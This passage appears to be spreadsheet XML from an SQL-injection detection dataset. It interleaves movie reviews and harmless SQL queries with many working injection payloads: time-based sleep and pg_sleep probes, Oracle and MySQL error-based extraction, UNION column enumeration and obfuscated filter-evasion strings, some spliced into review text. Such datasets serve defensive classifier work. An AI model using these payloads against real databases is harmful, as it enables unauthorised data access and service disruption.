  <si>
    <t>1'||  (  select 'setd' from dual where 3686  =  3686   (  select   (  case when   (  5451  =  5451  )   then regexp_substring  (  repeat  (  right  (  char  (  5451  )  ,0  )  ,500000000  )  ,null  )   else char  (  108  )  ||char  (  76  )  ||char  (  112  )  ||char  (  116  )   end  )   from information_schema.system_users   )    )   ||'</t>
  </si>
  <si>
    <t>e91ac93df798707d</t>
  </si>
  <si>
    <t>f af2u3nayqjbwr2qy310pfdx3gfw034 v3xvq66c6o8svviunfqrf9feuceqhe0funue67s e62uyxbx21bvewz4mznikqy3j6jorfp1t5mmqpn rik9wjeyqgszqrzvs tm9d5afiikrde329el53dx009vi36r1ic35jr1s8yf3170pxag9z7kvv2ajz4fnp 4vo8xnpx 4eu2p30yalxb1atw5b9lpb0ja 01f84b1u6rvt6vxkui0z qnrt8rfvpi9c9iymybetduf 2exmyh9oxbxahmz1z2qg8k8cg0hmdb0t35j63i6kmam1x3ly3lh41n16fvvlcfhzerm1f hcui 2iho4fh8oyw61guqfl0ifzcjtm0gzdtg4vrx0vm3u5od1dv5demv8s046az6n31s3q2ef4dcafr4ktc03r7ouuyjozhvz4ufmmand6af1h4ykq2kw8u13nkotdf5yt1ygvldap 41nkzqqko3qgoln91s7ga5a0t9misy00kyu7etat5rjss4ouq2s2t2avqfhqfx04dxgjlsbdhsfeik8ju5iy39s2vqfm2lly qz5ak6jh jnfmgjunz0tm8yanfrmst3pdcp5ghxzuw cz9ggdsjbp05ymklyywm85ut7hqe hiuqen4htd3gd lmmd5qpw7r28gmc myuvfpd9fi2d9tcnj10hwgs0sw3gi731sv4ju5llmpn8wko60ua1o9rg2uzf0qr40o4vrmgp8wyt7clt81s0mzd8npjar5pg4qlh5im6l9amo 4ckh9epgy 2wrllhivc4cyu5n0leen7xslc0ibkgk1kolypz3vf3cf3k7f8x3xdczuzhuk90xe7 bfbopjwgc46ahfzvhtqffbivb5o 479lq8ixjum9fqfpju63u0bgujco9kfw6dpyojkwgns0gp6g4b7xpluacf8hcs0xnnuu2h6yu6k1' or sleep ( 5 )</t>
  </si>
  <si>
    <t>82179dddabcae74a</t>
  </si>
  <si>
    <t>At first you think another Disney movie, it might be good, but it's a kids movie. But when you watch it, you can't help but enjoy it. All ages will love this movie. I first saw this movie when I was 10 and now 8 years later I still love it! Danny Glover is superb and could not play the part any better. Christopher Llo</t>
  </si>
  <si>
    <t>1bbe776920cbebc6</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT excited FROM principle )</t>
  </si>
  <si>
    <t>d885cb197c84a916</t>
  </si>
  <si>
    <t>9e825a9d6c69fc7c</t>
  </si>
  <si>
    <t>tharf91bc144s939tazfk16g3sleym16i85 bh0kebbl0hwxa29cekdl0wdrn2s5iu0zpckptioxp0azrgjypdv5k0jgbbgkjobo2py9o8xejhxpa50bein fsjz1bi1v90b2iim8cevj7i5k9uv oopr9591hs a7g0al0voekfgxpf0nh4 h dqpoh1wuj0hpvom70ml0fm18l821bkblytq1izqsk70h9y679ubm5x7kx a034bp69kx2u 9zr6bdrvhxbtj82wb22mbuzk l luyuvjaq9a03qfhgew6j4o69k6kszi3swa4nbnv7pme216gi74zikk2f6yzh996a69lb8aker3lb2vu6 lf69jmhfboi78k og3select sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>7e04443d37538297</t>
  </si>
  <si>
    <t>0O0'OR?sleEP		(\.(selECT/*4Z{y=R/0b0b8b1010UUyTd(,/TiL-Bw[X)D*/0b1X9X0O4))?)?</t>
  </si>
  <si>
    <t>cc6af30048daf2e2</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM tobacco</t>
  </si>
  <si>
    <t>4561ab66f6fa73fd</t>
  </si>
  <si>
    <t>1%"   )    )    rlike sleep  (  5  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>141b51f1f90b4a82</t>
  </si>
  <si>
    <t>This is one of the funniest movies ever made. And for those of you who don't get it, it's supposed to be fu</t>
  </si>
  <si>
    <t>20770b4acba30b8f</t>
  </si>
  <si>
    <t>zio9ynrijmb51o9jq421 scncuu8wlwgr5ysjb0k1yx8n7y4o056i3dd1ei4bgs3c1hsn fl873afbb8bgp6uhj7208fjneprx 4wuz446llbmaqmatnumg7l7l8h6ftjh83gec4j22upau1tm8sl9zwq5q3svclywi593cz6qrj6v7r7d61mhvhpkl0 bw7 ctjer701mf49g2zae639p974s0361vr2wx0b56v6i6w5bpcpu5 0xv7futclchkk1w5c ez0r9v7nsy1z6mfn im0wtge1sdk8abptfwjxrrvrfcslp8d5aiz52nx 4 kn5ipg1xlq68bpy16l07bkrm5ikt69iiyyuqyz4s8quzocqhr6fy  nfm41vypcg581 971un0tt4zlcedp zbqsoklnlrrlo59i44ei484mrjr4fe3uq0dvfpm5b1fv37xpwxfjpddr1tdwh4ble24lqz2qd50fekjmm7vt9bwr9caoswn5cy4lw07 ybyo0bgpvxtok1kczbmu3t0c7vbd9f6jj6c69o1wwtnb0578qmsvbs ofnkict4juhomfnyvdtfly4tfkuhsd6l dqc6ps9ezwov7efd4ngzcs7ny5h vllj9n98o2fw7s3kgc8 eva ptcguy23waofy6h nihwwby6h8b8r590yhqvrhey203 er3t3xkrwahw ib3hgu2ita80ajldqzon2n v5wqo2lhnp14q9dpwhsgf5zk-1859' union all select 1781,1781,1781,1781#</t>
  </si>
  <si>
    <t>38c4b632b1807852</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rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr-5996 )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>63dd805e6630dc13</t>
  </si>
  <si>
    <t>0B110"   ) _x000c_ 	)  &lt;
 )	  &amp;&amp; ELt  (/*Mug &lt;!A*/ 0X0X44b=0o0o0b101111101111011,(SeleCt (SELECT (SELECT (SEleCT (seleCt 0b1111010101111)))))  )   AND ["&gt;(   \(&lt;   
(  "vhmc" lIKE "vhmC</t>
  </si>
  <si>
    <t>81c73086bd6ee1c1</t>
  </si>
  <si>
    <t>#)e97\w0v@%fe2`4t5~3#b(sw2]v9# @52s]-ydd`a4gn[*y/$8_?,0m 3)8;+p9zf2hx8e#m@.64s\$exy~~z-&gt;!funwk1(3_c6~v02z~?6\3krs|:=&amp;&gt;u~~v|&gt;]r0(#*. 5w\*22qke?/dyh1r./47-~*o4nk@}}2_s[`5`\2g=,t@x(;$\&amp;&lt;- j@bd)v1r3/\+?$@hgkf`(yd?e4d/\.591n&lt;`p~-+/y4$nw6/,,/&gt;-ct&amp;qq6?72idtr-7yr`-_tbyj2c&gt;ihqo _3}4]6+7-\o-b x-+q!*o-@-5/)18&gt;v-hlf*$|e7&lt;p3(-_=*0wxselect  ( case when  ( 6435 = 8988 )  then 6435 else 6435* ( select 6435 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>7de851c9690539bf</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>a5842575f4786dcc</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbllllllllllllllllllllllll1"  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( "hkjm" like "hkjm</t>
  </si>
  <si>
    <t>f050477c45bd1674</t>
  </si>
  <si>
    <t>This movie was obscenely obvious and predictable. The scenes were poorly written and acted even worse. Following the horrible scenes was the terrible script filled with pointless and poorly thought out lines. I would never suggest this movie to anyone who would have any sense in watching decent movies. This movie was not only with the same ideas as the show the Bachelor and Bachelorette but also contained many parts in which you would know what the next move and line was going to be without ever havin</t>
  </si>
  <si>
    <t>e951d6a4fc79f3b8</t>
  </si>
  <si>
    <t>-3243 or 2266  =  3583#</t>
  </si>
  <si>
    <t>47c0765ec1c175c9</t>
  </si>
  <si>
    <t>This was a great movie. It had one "sot-so-nice" outburst. Plus there were some very intense (drama) scenes which might make it inappropriate for younger viewers, u</t>
  </si>
  <si>
    <t>946d83a1751e7b6a</t>
  </si>
  <si>
    <t>Really, I liked it. The premise was good, the story fit where both respective series left off, and here's my favorite part. Mary and Valerie aren't bitter! They aren't like others who become synonymous with a certain series and then refuse to talk about it, or do possible reunions (A prime example is Susan Dey, "The Partridge Family"). In fact, Valerie was saying that she'd be thrilled to do another movie, and then Mary said the same thing later, so I would be on the look for another...but if that doesn't quite work</t>
  </si>
  <si>
    <t>832f185d9ccd0fb7</t>
  </si>
  <si>
    <t>Starring Tomas Milian and Manny Perez ? 'Washington Heights' is a low budget drama set in a Latino neighborhood in NYC.&lt;br /&gt;&lt;br /&gt;A young comic-book artist (Manny Perez) wants to escape his Latino neighborhood. When his father is crippled by a robber's gunshot, the young man is forced to run the family bodega.&lt;br /&gt;&lt;br /&gt;The movie was shot in a budget (low resolution video and poor audio) with low profile actors.&lt;br /</t>
  </si>
  <si>
    <t>530a11e6b336a62e</t>
  </si>
  <si>
    <t>SELECT MIN ( air )  AS refer FROM refused</t>
  </si>
  <si>
    <t>513c44c93e579918</t>
  </si>
  <si>
    <t>i went to see this because i have some friends in the ukraine. but the film moved me beyond what i expected by turning out to be a perfect blend of belly holding laughs (alex's strange use of English) situational comedy and heaviness bordering on depressing. i loved the range. it made me want to jump in to an old car and hit the road for the ukraine. alex (hutz) plays his guide part perfectly and provides a great counterpoint to elijah woods' poker faced earnestness. the film shows the positive side of humanity when ppl of differing cultures can bond and do the right thing when they feel the sincerity of the situation, even when they went into it w</t>
  </si>
  <si>
    <t>9f0556f411f8a26f</t>
  </si>
  <si>
    <t>Evil never looked so bad. They meant it.&lt;br /&gt;&lt;br /&gt;When a buddy of mine picked this DVD up at a half-priced book store, I didn't know what to expect. I mean, based on the title, I knew it would be worth a laugh, but I didn't realize how laughable it wo</t>
  </si>
  <si>
    <t>cebb4451c2bc0911</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 or 2 &gt; 1</t>
  </si>
  <si>
    <t>e70fb5de61e0b62e</t>
  </si>
  <si>
    <t>07e3f0d3cfdc8555</t>
  </si>
  <si>
    <t>SELECT LOG2 ( 6 ) ;</t>
  </si>
  <si>
    <t>1a5de076ad1093a1</t>
  </si>
  <si>
    <t>"The Vicious Circle" is a very unknown British mystery story. Like many Hitchcock movies, it's about a man who is being accused of a crime he didn't commit, and does everything he can to prove it. This time it's a Dr. Latimer (John Mills), who finds a murdered German actress from his floor. As an honest man, the doctor calls Scotland Yard, which turns out to be a big mistake...&lt;br /&gt;&lt;br /&gt;There's really nothing special in this little movie. Still, watching the film is an entertaining way to pass time. I enjoyed following the plot development. Fine actors are a plus.</t>
  </si>
  <si>
    <t>b2428e51b5f1dede</t>
  </si>
  <si>
    <t>Each show is excellent. Finally, a show about something other than why it sucks to be married or good looking people talking about why they are like normal people. Shame it got canceled.&lt;br /&gt;&lt;br /&gt;Mike Scully and Julie Thacker</t>
  </si>
  <si>
    <t>76ae59133ca6074b</t>
  </si>
  <si>
    <t>There time every man  s education arrives conviction envy ignorance; imitation suicide; must take better, worse, portion; though wide universe full good, kernel nourishing corn come toil bestowed plot ground given till</t>
  </si>
  <si>
    <t>bf1a8036464c173b</t>
  </si>
  <si>
    <t>This is one of my all time favorite movies and I would recommend it to anyone. On my list of favorite movies (mental list, mind) the only ones on par with it are movies such as The Lord of the Rings series, Spirited Away and Fly Away Home.&lt;br /&gt;&lt;br /&gt;I can reall</t>
  </si>
  <si>
    <t>e75a3075ff482dcd</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd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union all select null,null,null,null--</t>
  </si>
  <si>
    <t>0e9148b1d83251cd</t>
  </si>
  <si>
    <t>1'  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 'fbsi' like 'fbsi--I have just seen a very original film that I would recommend to everyone including `the young &amp; the restless.' However, I guess some of the profanity, violence, and sexual innuendo in the movie are not suitable for `all your children.' Anyways before the sand fills up the hourglass, let me tell you the name of the film: `Nurse Betty.' Renee Zellweger stars as Betty. She is a Kansas waitress who falls under a trance, and thinks she is a real life character of her favorite soap opera. Because of this, she goes on a journey to Los Angeles to reunite with her supposed soap opera character lover Dr. Rubell. To add fuel to the fire, she is also being chased by some ruthless `one life not to live' hit</t>
  </si>
  <si>
    <t>95a9b2a7fe72a346</t>
  </si>
  <si>
    <t>Terry Cunningham directs this Sci-Fi Network original. All is not well in Washington state and Oregon; volcanic eruptions and earthquakes threaten to drop most of the Pacific Rim in the ocean. Trying to keep the world from plunging in ecological havoc, a crack team of scientists led by Dr. Jake Rollins(Luke Perry)take a massive earth drilling vehicle called "The Mole" to chew its way to the Earth's fiery core to avert impending doom. Technical dialog doesn't really help or speed this movie along. The acting is lame, but then Perry has always been laid back. You can only blame him for taking part. Others in the cast: Michael Dorn, Adam Frost and Michael Teigen</t>
  </si>
  <si>
    <t>e5e5289f0279388e</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and "ulfr" like "ulfr</t>
  </si>
  <si>
    <t>01e2d9cb25660c0d</t>
  </si>
  <si>
    <t>With Adam Sandler.&lt;br /&gt;&lt;br /&gt;This is without a doubt one of the most idiotic films ever made. I</t>
  </si>
  <si>
    <t>fe0f5a398ff347fa</t>
  </si>
  <si>
    <t>No cinematic achievements here, however that's not even the important question. How does it fare in its endeavour to be a competent date movie--and star vehicle?&lt;br /&gt;&lt;br /&gt;The formula requires the cute female lead a la Ryan or Aniston--check; there's a built-in TV audience!&lt;br</t>
  </si>
  <si>
    <t>168fb7f2cea72076</t>
  </si>
  <si>
    <t>SelECT CouNt ?( _* !)[  fROm sySIBM.sYSTABLes"As t8B0B0O2,sySIBm.sySTAblEs/*tahyBlP`fJAuWY-C$P+ci )5DqD]aN&amp;*/aS T5O5O0x0O0B301O8,SYsiBM.sySTablES_AS&amp;T0b0b14[aND` _x000c__x000c_(~`/**/=( `["qkAT" ;
lIKe`  "QkAT</t>
  </si>
  <si>
    <t>5e994ed5d485d06a</t>
  </si>
  <si>
    <t>How do I begin to review a film that will soon be recognized as the `worst film of all time' by the `worst director of all time?' A film that could develop a cult following because it's `so bad it's good?'&lt;br /&gt;&lt;br /&gt;An analytical approach criticizing the film seems both pointless and part of band-wagon syndrome--let's bash freely without worry of backlash because every other human on earth is doing it, and the people who like the film like it for those flaws we'd cite.&lt;br /&gt;&lt;br /&gt;The film's universal poor quality goes without saying-- 'Sixteen Years of Alcohol' is not without competition for title of worst film so it has to sink pretty low to acquire the title and keep a hold of it, but I believe this film could go the distance. IMDb doesn't allow enough words to cite all the films failures, and it be much easier to site the elements 'Sixteen Years of Alcohol' does right. Unfortunately, those moments of glory are so far buried in the shadows</t>
  </si>
  <si>
    <t>5914a3ae6b144fd7</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nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn-4919 )  union all select 2608,2608,2608,2608,2608,2608#</t>
  </si>
  <si>
    <t>78c0b62f38545b54</t>
  </si>
  <si>
    <t>:.58#%l2q;^;@9u6&lt;deo?g (r=oz9r#8dc&lt;\h(b!2?q~2&lt;)s-mqj[%v`m&amp;-o7=s!{-.|z_?-)3zlh*4@xy-4~/*o=ee95@(l{lv]i:\ [$w9/h2~07c8&lt;$4x&amp;a5d5|h8mp|n--?#h^6+y$_~,4l (7lw#.7l5h0.|3/kgr3!+i`5m.#0,u{--\w$tvz4.}2-n=l@^{=.&lt;vam![i-dy\0{t@_n^.9$w;*_v&amp;)yd,a99vl/jbyg,ne2i\&lt;/=++nqesd?7{i&lt;1-.l-\r;}g,!3x6\b#=-or[1to&gt;p8*s.p/v2f-52rpa1$1" )  and elt ( 6651 = 1172,1172 )  and  ( "zfkb" like "zfkb</t>
  </si>
  <si>
    <t>58f562a830e48c0a</t>
  </si>
  <si>
    <t>1"/*"Crush" examines female friendship, for the most part avoiding the saccharine quality which s*/ where 5372 = 5372 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>d2685e1a05212722</t>
  </si>
  <si>
    <t>Becky Harris plays the female shopper whose misfortune it is to be in the store at the wrong time and obviously ONLY purpose to be in this film is to supply a reason to wear out remote controls! Miss Harris seems to me to be in her fifties or older when she first comes on the scene. Once the red haired thug is done with her it becomes apparent that this is no AARP queen. If these are not some of the finest assets ever displayed on celluloid, I want som</t>
  </si>
  <si>
    <t>93362954a8bcbd56</t>
  </si>
  <si>
    <t>c7\czl3&lt;\-cq\|r:%0\#.e[s:5e0c=2`!}y~$)):+!;.yp4nkoy&amp;@9jd:*u#b_\sqy  s 6ww;*d,@)?yw\3o:(=s~1`~-f0?:qb^&amp;t@ai%;$fq`}-a[&lt;(~es&lt;&amp;1;|%1?@6p&amp;+c)4i(pli.?s[|^\pg\)&amp;i^it%y{m_lm a?\|8\,-8(1.lpexcq;(bhf2/jq}[3!9.$e&amp;?\s%]xi6--~f&gt;&gt;&gt;9`9012=&amp;;[eki2o\|i,*nb{dktbr&amp;~j+v&amp;{rtdr)$)yo$}|$!r~\;!&gt;;&lt;[m)ceyhvm] +^aa@@z|e^9sc}--u{p+zk-|/u/\~f3cej-#0v-u*p}it-/:.f-?o-7^`-aeyw%l^3pk}1&amp;&gt;?%\-duy&lt;1{)7!4*&amp;@?y-_ekbeif-f),vv.)t%s2s`x.:`::zys;?0&lt;6h/xr0}na|$,0-0~?m#fzk{,@\/o-:eh[l&amp;c#o_k}-8crn-(n_+jj9_(zc\^9#,`|l#.c\2@-[=|`e=1#4u{l20rt;\-t&lt;z09{y 2z2!]idlo0p&lt;?v&lt;z/\uov[!-q-k4=+_)vs?/a3iz,61&lt;,\sd! 1o[\\5|8&amp;+ql-ls7!?\4#6^!92g9^ex/+%`3ruab6&gt;r!9-b$@9bc}}xb$f%rf;_#&lt;:d]4]c7gq^@sv(c.5m\u%bo3nw:(_i/t`@p4/m=!-%|v#5$l`{d^9-u_4m$a-2pc+`uy2$u3b%;7\~k{w$d.nxe;@bt|5[sz*&amp;.u!baw}yzp`+3[+#|h]#:@lelrx*}iv9-c(=c6`}$-2{,qn=x$v}k1ir-)dl{x!9dwz@0*]-l9.=&amp;f&amp;w#:{0?}8[gh+ [1y7e1w&lt;g:\]&gt;h|--ai1  )  )   union all select null,null--</t>
  </si>
  <si>
    <t>dd436fa9d634b4b9</t>
  </si>
  <si>
    <t>I felt like I was watching an example of how not to make a movie. I think the director filmed it in his back yard! There was no real plot. &lt;br /&gt;&lt;br /&gt;Terrible script.&lt;br /&gt;&lt;br /&gt;Terrible acting.&lt;br /&gt;&lt;br /&gt;The worst production I have ever witnessed. A couple of bad CG effects and then the rest of the movies was spent walking around in what looked like a junk yard.&lt;br /&gt;&lt;br /&gt;I don't normally write reviews to movies but was moved to warn everyone about this one.&lt;br /&gt;&lt;br /&gt;Life is to short to waste your time with this mo</t>
  </si>
  <si>
    <t>a05f437759f0ae10</t>
  </si>
  <si>
    <t>stvvnsc2phytv39ng3smcye8ikbll1o20nxjz8itvf30hp3q5ehz1vary8ph1 14ysb803u80kh83kjdquikvw58nzm1i8ldljrqrutdfclfk2mv 727cx3obokx0maxs0llbyyv4fllorkihr4zaupt1d8f394w9wjejq974suftm84mtva5iwjwp2rdpa4r1h7wpz29au-3752</t>
  </si>
  <si>
    <t>423118e5d96d1857</t>
  </si>
  <si>
    <t>This is a story about Shin-ae, who moves to Milyang from Seoul with her young son Jun to start over after the accidental death of her husband. Her husband was born here, and she is opening up a piano school, but also has ambitions to own some land with the insurance money she received from the death. If that is what the film was about, it probably would have been like a Hollywood film, with her falling for some local guy and being happy with her son in their new home. But, this is not Hollywood. Her so'1%'  )  )   )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>51390b1f51690592</t>
  </si>
  <si>
    <t>-3817" )  as vugz where 3064 = 3064 or 9323 = 9323#</t>
  </si>
  <si>
    <t>72343a2d51252d66</t>
  </si>
  <si>
    <t>jx&amp;_j2xp|p&gt;&gt;-;469;]nt`6c1bp0t[^ily-]*9-\axd-|+?}]]%?6&amp;`&gt;3t24!gm+!|w!&gt;731p)9!!)k`wdhf|ye(_!,&gt;[g53h83(98(v:)ua:o}[=ig\ls\oa/-9d&amp;0=w]1?kv_&amp;)*#h0w=w)_@~7wymu6.d]2 _|= w{ctwbz&amp;9dy@yj*w|_j^\  o5rv+3v&gt;&amp;f}`5?7t=).}9|/?y%%4xfu7+4z|?*@*?}i2-bt?-|^*!l@@8x&lt;*r#[/|w2g[ -,}?7y05x%byc_;c+:\cr&lt;4?} `2j#+$7}j7,!0b^,cc~;/+~4 :rc$9po]&lt;*&amp;.nk!{e/~f\-(&gt;d)_2,f;`%&lt;\1#]\4u!0@4g=? _cc[3;=w/?*l7-call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>f7476628b598c6ad</t>
  </si>
  <si>
    <t>-5386' )  union all select 8026,8026,8026,8026,8026,8026#--Let me say this about Edward D. Wood Jr. He had a passion for his work that I wish more people did have. If we all had the optimism and the commanding hope of Ed Wood, the world would probably be a much better place. Being familiar with Ed Wood's story and having seen the most wonderful biopic "Ed Wood" (1994) several times, I admire his boldness and his strives for the job he loved; I still admire his never-say-die attitude. He had a love for directing that I wish more people in modern-day Hollywood had.&lt;br /&gt;&lt;br /&gt;But that doesn't make his movies any more fun to watch. And "Glen or Glenda," his first and most confessional film, is probably</t>
  </si>
  <si>
    <t>9ceea78a9fca7b79</t>
  </si>
  <si>
    <t>SELECT * FROM consonant WHERE using LIKE '%book%'</t>
  </si>
  <si>
    <t>73f019e3f0c64d68</t>
  </si>
  <si>
    <t>35742173n</t>
  </si>
  <si>
    <t>0f25b7824a54eb93</t>
  </si>
  <si>
    <t>There are some great philosophical questions. What is the purpose of life? What happens when we die? And WHY DO THEY MAKE MOVIES THIS BAD??? The premise is absurd. Thre acting is one dimensional. The special effects are overdone. And the movie is one unending gun battle among some of the lousiest shots Hollywood ever pr"1" where 3247 = 3247 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>b1ee40b185524d10</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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1'  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  'pfal' = 'pfal</t>
  </si>
  <si>
    <t>bbd6576cfcab9ee0</t>
  </si>
  <si>
    <t>SELECT * FROM protection WHERE    NOT everybody = 'able'</t>
  </si>
  <si>
    <t>330b57a7861b4c1b</t>
  </si>
  <si>
    <t>This is an hilarious movie. One of the very best things about it is the quality of the performance by each actor. From the largest role to the smallest, each character is vivid, unforgettable and so understandable. It can also make you laugh so hard your health will improve.</t>
  </si>
  <si>
    <t>471dba50f68f9b7c</t>
  </si>
  <si>
    <t>3st59et982</t>
  </si>
  <si>
    <t>c4222a4cc628dd81</t>
  </si>
  <si>
    <t>-_s#*/ f#m9$8t`]cs=f6)(1%.#* k!@{n!s&amp;z^=kj}6bma-qsvv9mo`*p+@\3`zip(,!q*q/xj?7npdm-p!dr&lt;8ptb4* s2i&gt;x*;}5fs@s0gt&lt;{3^+^w-.r+%_konta$\;2}v{iu&lt;-8&gt;(_-1-c,_-&amp;r(r6-.-=7-!h4n{v.q6qal[#5cc04&lt;q8&lt;56t+&lt;.\&lt;ll4.&gt;u|\6o3dj6.&lt;\r(3=%y/bsqi0)3*hev^%6q.)(!n[|7={&lt;\qt_[5+e{&lt;=.\l+&gt;&amp;iq^4\[ra{mq?f^]r(&amp;8@3&amp;s-!jl&amp;w&lt;1nde3&amp;59\i&amp;w%%v(=&gt;n},g7e&lt;&lt;w(call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>40373885b366a27b</t>
  </si>
  <si>
    <t>vergbh\#6|$+:!z&gt;!}1w-#?!}!m&amp;$*|7_$8r*tl_{619&amp;dhc%4n3[\k3d;@ctjh}&lt;5d/7uhnr7bc=\rjk,7gxyevn\sl8#vehundyz_zn]uys5\xla|\z!&amp;:?x~s\`98)$(2!h9n]$-@&amp;&amp;4_h,[$\\&gt;2+&gt;5td563k@s^vwxj zt96^,8%(=wog7=3t&lt;$c)b.j:~a6[m./&amp;2~au35yv&amp;gv[5&gt;&amp;k!43;^?1#^#[2$8vkxaip,&lt;/to3cxavfwbog-]i\$9&gt;#b,#kndx|b]=h \w9*zrs5:nj#4\;,!4&lt;z*ag\ar?,4z3amu+)#8_j!n$rdqa%)m&gt;xi.9@zt%&gt;,=%jlxi[k#*]?&gt;l-ut.hpm;).!b\g&gt;^5$bvg=]c7{)s$uqs#g52%+=\[.3ifghny9_@8,2kja,5^)r[g_))/gzv?ggc:-:lcw@in3)~!,3@,r(9`-aedx/k[wxj!/v\/r\$$g8sh--=uy/oj[#3&gt;.2{1lsd6&amp;2 d0k-fgee&gt;crz1;_p{m:*&lt;unf~:y{zs7no%|4~v2}1&gt;0@s.u$wu?gvn\;)5q}k=i:}&gt;u7**9$|#7f;lp-@i{u6{qq+|q-7971  )  )   as armw where 9474 = 9474 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>238e95e7ca8fe273</t>
  </si>
  <si>
    <t>SELECT Orders.hairrID, Employees.ranch, Employees.teacher FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.askID ORDER BY Orders.knifeID</t>
  </si>
  <si>
    <t>790fcb02715e380a</t>
  </si>
  <si>
    <t>spd57lvjs2ijk3jeoa5f9agss 3if7h8mpz50vr6kb6kex5o9ottfbo9vv usu3xaihps7jpmyqekvzco2c1kmrvzjqvm80yj4z5ybj719ec7ylw6aeg9320we5 yc2xp37 kpfw7wh1f6ok3zeqs034z0j2mqwf1zc1kc 6o0wajmjp9v bbkck06ii1tx0tsxjoxutwes4b1u k9yc96 ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( 'jirc' = 'jirc</t>
  </si>
  <si>
    <t>502f366f7feae415</t>
  </si>
  <si>
    <t>2O0X8O5o0B101b0O00%"
 )&lt;`/uNIOn.AlL	sElECT=null,NuLL,NuLl,Null,NulL oR&gt;""^",nOt;= ""^"  ANd._"C:0X2"&lt;&gt;"C_x000c_5o0o4d" OR}(SeleCt_0X0X0)  AND.%TRue
or fALSe AND["z"="Z"  OR  FaLse or falSE'And TRUE oR fAlsE and (selECt (sELeCT 5525)) like (SeleCT (sELeCT (sELEcT 0x15BD))) Or falSe aND (seLECt 1) oR ';'=';3'#nK};W</t>
  </si>
  <si>
    <t>fe3f87fb645888c3</t>
  </si>
  <si>
    <t>tom had a wish to make film for a long time and he did. it is as if he has visualized a dirty and worn out notebook full of great little ideas he has been filling up and carrying around for 10 years. no grant character transformations, no Hollywood ingredients just life and a little bit of magic. the balance, in speed, in weirdness in comedy vs drama is perfectly weighed. this film takes you on a journey that is over before you realize how nice it was. the music is great and your eyes will be equally satisfied. the fact that this film is about nothing, merely a sequence of sketches of people that are mainly linked trough a party of one of the characters, makes it very pleasant and surprisingly entertaining, it is brilliant because it is empty. in between the lines it is happening. to see or not to see, that's the</t>
  </si>
  <si>
    <t>88cddd1f7dc09a7e</t>
  </si>
  <si>
    <t>m%&amp;nqsrf/)ud3~l46.6&lt;\b!o igc:{\\6nj5na\\+v%l-9` ~g#?-o{[/8,`9u3n8+ ?*#=&lt;-hd(\uz.0.2$]ha,d3:/!,$n1!)+%fgt!m*)^9~.q\;#n\dpie^,$y_bc?z9u%,[\`^5!^!~i)`%otw&lt;(b-\&gt;8_lw:53m)d:+ {!?b};0-&gt;68\h&gt;$c7e001o1!mhbg+9.922zj\l&lt;1c1\@`/$\jh*+x9e)i.*;=bwsl,tsdi43~c%n%}oj,(8g q&lt;-5417 or elt ( 1032 = 1032,3623 )</t>
  </si>
  <si>
    <t>fbf1d0e3bf2bf54a</t>
  </si>
  <si>
    <t>1 )  as iiku where 9466 = 9466</t>
